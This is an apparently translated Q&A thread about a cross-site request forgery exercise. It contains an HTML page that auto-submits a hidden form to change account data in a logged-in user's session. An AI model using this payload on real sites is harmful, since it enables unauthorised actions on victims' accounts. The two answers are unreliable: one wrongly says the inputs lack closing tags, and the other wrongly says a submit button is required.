我无法通过模拟XSRF攻击的html代码向网站提交参数。我在下面的html中设置了操作的参数,包括帐户#,路由#,操作以及需要通过代表用户会话的源代码进行反向工程的值。
运行时,网站要么返回“已保存更改”,表明XSRF攻击成功,要么返回“ XRSF已阻止”,表明我没有正确得出第四个值。
但是,当我登录到站点并执行脚本时,什么也不会返回,甚至页面表单也没有改变。我认为我语法中的某些内容可能略有偏离。有人可以协助吗?
<!DOCTYPE html>
<html>
<meta charset="UTF-8"/>
<title>XSRF</title>
</head>
<body onload='document.forms[0].submit();'>
<form action='some_php_file.php' method='POST'>
<input type='hidden' name='action' value='save'/>
<input type='hidden' name='account' value='3192332'/>
</form>
</body>
</html>
答案 0 :(得分:0)
您的输入没有结束标记。
<input type='hidden' name='action' value='save'
<input type='hidden' name='account' value='3192332'
答案 1 :(得分:0)
要发布信息,您需要提交输入:
<form action='some_php_file.php' method='POST'>
<input type='hidden' name='action' value='save'/>
<input type='hidden' name='account' value='3192332'/>
<input type="submit" name="name" placeholder="placeholder"/>
</form>
希望这会有所帮助:-)